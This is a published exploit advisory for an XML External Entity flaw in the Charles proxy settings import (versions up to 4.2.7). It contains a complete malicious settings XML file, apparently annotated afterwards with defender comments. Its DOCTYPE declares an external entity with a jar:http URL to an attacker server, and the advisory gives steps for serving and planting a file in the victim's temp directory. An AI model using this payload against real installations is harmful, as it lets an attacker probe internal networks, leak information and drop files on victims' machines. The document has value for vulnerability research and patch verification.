Charles 4.2.7 XML External Entity

Software Link: https://www.charlesproxy.com
Date: 11.12.2018
Exploit Author: CK01
Version: <=4.2.7

Security Issue:

An XML External Entity (XXE) vulnerability exists in the Charles import/export settings option. If a user imports an attacker-supplied "Charles Settings.xml", the parser resolves the external entity on the attacker's behalf, so the internal network may be probed and information may be leaked.


POC:

1. Charles Settings.xml (127.0.0.1 stands for the attacker's server):

<?xml version='1.0' encoding='UTF-8' ?>
<?charles serialisation-version='2.0' ?>
<!DOCTYPE data [
<!ENTITY file SYSTEM "jar:http://127.0.0.1:2014/!/">]>
<!-- Defender note: the internal DTD subset above declares an external general
     entity with a jar: URL. A parser that processes DTDs and resolves external
     entities performs the outbound fetch when &file; is expanded later in this
     document (inside <currentDirectory>). A settings importer should reject any
     DOCTYPE in an interchange file, or disable DTD processing and external-entity
     resolution before parsing. -->
<charles-export>
  <proxyConfiguration>
    <enableSOCKSProxy>false</enableSOCKSProxy>
    <dynamicHTTPPort>false</dynamicHTTPPort>
    <dynamicSOCKSPort>false</dynamicSOCKSPort>
    <enableSOCKSTransparentHTTPProxying>true</enableSOCKSTransparentHTTPProxying>
    <port>8888</port>
    <SOCKSPort>8889</SOCKSPort>
    <decryptSSL>true</decryptSSL>
    <transparentProxy>false</transparentProxy>
    <preferIPv6addresses>false</preferIPv6addresses>
    <sslLocations>
      <locationPatterns>
        <locationMatch>
          <location>
            <host>*</host>
            <port>443</port>
          </location>
          <enabled>true</enabled>
        </locationMatch>
      </locationPatterns>
    </sslLocations>
    <defaultSOCKSTransparentHTTPProxyPorts>true</defaultSOCKSTransparentHTTPProxyPorts>
    <socksTransparentHTTPProxyPorts/>
    <socksTransparentHTTPProxyPortRanges/>
    <windowsConfiguration>
      <useHTTP>true</useHTTP>
      <useSOCKS>false</useSOCKS>
      <enableAtStartup>true</enableAtStartup>
    </windowsConfiguration>
    <macOSXConfiguration>
      <useHTTP>true</useHTTP>
      <useSOCKS>false</useSOCKS>
      <enableAtStartup>false</enableAtStartup>
    </macOSXConfiguration>
    <mozillaFirefoxConfiguration>
      <useHTTP>true</useHTTP>
      <useSOCKS>false</useSOCKS>
      <enableAtStartup>true</enableAtStartup>
    </mozillaFirefoxConfiguration>
  </proxyConfiguration>
  <recordingConfiguration>
    <limit>100</limit>
    <maxTransactions>0</maxTransactions>
    <maxWebSocketMessages>-1</maxWebSocketMessages>
    <ignoreHosts>
      <locationPatterns/>
    </ignoreHosts>
    <recordHosts>
      <locationPatterns/>
    </recordHosts>
  </recordingConfiguration>
  <accessControlConfiguration>
    <warn>true</warn>
    <ipRanges>
      <ipRange>
        <ip>
          <int>192</int>
          <int>168</int>
          <int>2</int>
          <int>43</int>
        </ip>
        <mask>
          <int>255</int>
          <int>255</int>
          <int>255</int>
          <int>255</int>
        </mask>
      </ipRange>
    </ipRanges>
  </accessControlConfiguration>
  <externalProxyConfiguration>
    <!-- NOTE(review): the upstream proxy host/port and the encryptedPassword
         values below are not part of the XXE trigger; they look like leftovers
         from the author's own setup. Since this file is imported as settings,
         these values are presumably applied to the victim's external proxy
         configuration as well (confirm against the import behaviour). -->
    <configurations>
      <entry>
        <string>socks</string>
        <mutableExternalProxyConfiguration>
          <active>false</active>
          <requiresAuthentication>false</requiresAuthentication>
          <port>0</port>
        </mutableExternalProxyConfiguration>
      </entry>
      <entry>
        <string>http</string>
        <mutableExternalProxyConfiguration>
          <active>true</active>
          <requiresAuthentication>false</requiresAuthentication>
          <host>127.0.0.1</host>
          <port>1087</port>
          <domain></domain>
          <username></username>
          <encryptedPassword>2aQ4yHV+W99fhLcoM+aSlQ==</encryptedPassword>
        </mutableExternalProxyConfiguration>
      </entry>
      <entry>
        <string>https</string>
        <mutableExternalProxyConfiguration>
          <active>true</active>
          <requiresAuthentication>false</requiresAuthentication>
          <host>127.0.0.1</host>
          <port>1087</port>
          <domain></domain>
          <username></username>
          <encryptedPassword>X7aDnIieHyR9nVYpOPBpBw==</encryptedPassword>
        </mutableExternalProxyConfiguration>
      </entry>
    </configurations>
    <enabled>true</enabled>
    <alwaysBypassLocalhost>true</alwaysBypassLocalhost>
  </externalProxyConfiguration>
  <throttlingConfiguration>
    <bandwidthDown>57.6</bandwidthDown>
    <bandwidthUp>33.6</bandwidthUp>
    <utilisationDown>70</utilisationDown>
    <utilisationUp>70</utilisationUp>
    <latency>250</latency>
    <reliability>100</reliability>
    <mtu>576</mtu>
    <lowQuality>100</lowQuality>
    <highQuality>100</highQuality>
    <stability>100</stability>
    <customPresets/>
    <hosts class="listAdapter">
      <list/>
    </hosts>
    <selectedHosts>false</selectedHosts>
  </throttlingConfiguration>
  <startupConfiguration>
    <newSession>true</newSession>
    <throttling>false</throttling>
    <checkUpdates>true</checkUpdates>
    <maximised>false</maximised>
    <fullscreen>false</fullscreen>
    <mainWindow>
      <x>171</x>
      <y>64</y>
      <width>1231</width>
      <height>770</height>
    </mainWindow>
    <!-- Defender note: &file; references the external entity declared in the
         DOCTYPE; this is the point at which a DTD-processing parser performs
         the outbound request. Any entity reference in an imported settings file
         is a signal the importer should refuse. -->
    <currentDirectory>&file;</currentDirectory>
    <lastCheckUpdates>2018-11-12 07:40:37.437 UTC</lastCheckUpdates>
  </startupConfiguration>
  <userInterfaceConfiguration>
    <promptToSaveSessions>false</promptToSaveSessions>
    <promptToClearSession>false</promptToClearSession>
    <showLineNumbers>true</showLineNumbers>
    <lineWrap>true</lineWrap>
    <autoScroll>true</autoScroll>
    <combineHeadersAndBody>true</combineHeadersAndBody>
    <combineRequestAndResponse>true</combineRequestAndResponse>
    <minimiseToTray>false</minimiseToTray>
    <showMemoryUsage>false</showMemoryUsage>
    <enableHotkeys>true</enableHotkeys>
    <alwaysOnTop>false</alwaysOnTop>
    <showTrayIcon>true</showTrayIcon>
    <highlightTreeChanges>true</highlightTreeChanges>
    <sequenceFocused>false</sequenceFocused>
    <sessionNavStructureLayout>0</sessionNavStructureLayout>
    <sessionNavSequenceLayout>1</sessionNavSequenceLayout>
    <unitsSpeed>0</unitsSpeed>
    <unitsTime>0</unitsTime>
    <warningsSeen/>
    <properties>
      <entry>
        <string>SessionFrame.splitPlane.dividerLocation.horizontal</string>
        <int>300</int>
      </entry>
      <entry>
        <string>RequestResponsePanel.DIVIDER_LOCATON</string>
        <int>289</int>
      </entry>
      <entry>
        <string>SummaryPanel.TABLE_COLUMN_STATES</string>
        <columnStates/>
      </entry>
      <entry>
        <string>ChartPanel.SIZE_TABLE_COLUMN_STATES</string>
        <columnStates/>
      </entry>
      <entry>
        <string>ChartPanel.TIMELINE_TABLE_COLUMN_STATES</string>
        <columnStates/>
      </entry>
      <entry>
        <string>ChartPanel.DURATION_TABLE_COLUMN_STATES</string>
        <columnStates/>
      </entry>
      <entry>
        <string>SessionFrame.splitPlane.dividerLocation.vertical</string>
        <int>200</int>
      </entry>
      <entry>
        <string>SessionFrame.navTabs.mode</string>
        <string>Structure</string>
      </entry>
      <entry>
        <string>URLEncodedQueryViewer.TABLE_COLUMN_STATES</string>
        <columnStates/>
      </entry>
      <entry>
        <string>NavigatorJTable.TABLE_COLUMN_STATES</string>
        <columnStates/>
      </entry>
      <entry>
        <string>ChartPanel.TYPE_TABLE_COLUMN_STATES</string>
        <columnStates/>
      </entry>
    </properties>
  </userInterfaceConfiguration>
  <toolConfiguration>
    <configs>
      <entry>
        <string>Breakpoints</string>
        <breakpoints>
          <toolEnabled>false</toolEnabled>
          <breakpoints/>
        </breakpoints>
      </entry>
      <entry>
        <string>Reverse Proxies</string>
        <reverseProxies>
          <active>false</active>
          <reverseProxies/>
        </reverseProxies>
      </entry>
      <entry>
        <string>White List</string>
        <whitelist>
          <locations>
            <locationPatterns/>
          </locations>
          <toolEnabled>false</toolEnabled>
          <useSelectedLocations>false</useSelectedLocations>
          <action>0</action>
        </whitelist>
      </entry>
      <entry>
        <string>Map Remote</string>
        <map>
          <toolEnabled>false</toolEnabled>
          <mappings/>
        </map>
      </entry>
      <entry>
        <string>Port Forwarding</string>
        <portForwarding>
          <active>false</active>
          <portForwardings/>
        </portForwarding>
      </entry>
      <entry>
        <string>Viewer Mappings</string>
        <viewerMappings>
          <toolEnabled>false</toolEnabled>
          <mappings/>
        </viewerMappings>
      </entry>
      <entry>
        <string>Rewrite</string>
        <rewrite>
          <toolEnabled>false</toolEnabled>
          <debugging>false</debugging>
          <sets/>
        </rewrite>
      </entry>
      <entry>
        <string>Map Local</string>
        <mapLocal>
          <toolEnabled>false</toolEnabled>
          <mappings/>
        </mapLocal>
      </entry>
      <entry>
        <string>Black List</string>
        <blacklist>
          <locations>
            <locationPatterns/>
          </locations>
          <toolEnabled>false</toolEnabled>
          <useSelectedLocations>false</useSelectedLocations>
          <action>0</action>
        </blacklist>
      </entry>
      <entry>
        <string>Client Process</string>
        <selectedHostsTool>
          <locations>
            <locationPatterns/>
          </locations>
          <toolEnabled>false</toolEnabled>
          <useSelectedLocations>false</useSelectedLocations>
        </selectedHostsTool>
      </entry>
      <entry>
        <string>No Caching</string>
        <selectedHostsTool>
          <locations>
            <locationPatterns/>
          </locations>
          <toolEnabled>false</toolEnabled>
          <useSelectedLocations>false</useSelectedLocations>
        </selectedHostsTool>
      </entry>
      <entry>
        <string>DNS Spoofing</string>
        <dnsSpoofing>
          <toolEnabled>false</toolEnabled>
          <spoofs/>
        </dnsSpoofing>
      </entry>
      <entry>
        <string>Mirror</string>
        <mirror>
          <locations>
            <locationPatterns/>
          </locations>
          <toolEnabled>false</toolEnabled>
          <useSelectedLocations>false</useSelectedLocations>
        </mirror>
      </entry>
      <entry>
        <string>Auto Save</string>
        <autoSave>
          <toolEnabled>false</toolEnabled>
          <enableOnStartup>false</enableOnStartup>
          <saveLowMem>false</saveLowMem>
          <startOnMultiple>false</startOnMultiple>
          <savePeriod>0</savePeriod>
        </autoSave>
      </entry>
      <entry>
        <string>Block Cookies</string>
        <selectedHostsTool>
          <locations>
            <locationPatterns/>
          </locations>
          <toolEnabled>false</toolEnabled>
          <useSelectedLocations>false</useSelectedLocations>
        </selectedHostsTool>
      </entry>
    </configs>
  </toolConfiguration>
  <remoteControlConfiguration>
    <enabled>false</enabled>
    <allowAnonymous>false</allowAnonymous>
    <users/>
  </remoteControlConfiguration>
  <clientSSLCertificatesConfiguration>
    <certificates/>
  </clientSSLCertificatesConfiguration>
  <protobufConfiguration>
    <hideUnvaluedFields>true</hideUnvaluedFields>
    <cacheDescriptors>true</cacheDescriptors>
    <heuristicTTL>300000</heuristicTTL>
    <descriptors/>
  </protobufConfiguration>
  <gistConfiguration>
    <publishLimit>10</publishLimit>
    <secret>true</secret>
    <openGist>true</openGist>
    <enterpriseGitHub>false</enterpriseGitHub>
  </gistConfiguration>
  <focusConfiguration>
    <hosts>
      <locationPatterns/>
    </hosts>
  </focusConfiguration>
</charles-export>

2. On the attacker's server, run: java BlockingServer 2014 xxe.txt

3. xxe.txt on the attacker's server contains:

  This file comes from the attacker server!

4. A file named jar_cachexxxxxxxxxxxxx.tmp is created in the victim's temporary directory with the content: "This file comes from the attacker server!"



References:
http://www.pwntester.com/blog/2013/11/28/abusing-jar-downloads/
https://github.com/pwntester/BlockingServer
https://www.youtube.com/watch?v=eHSNT8vWLfc&feature=youtu.be
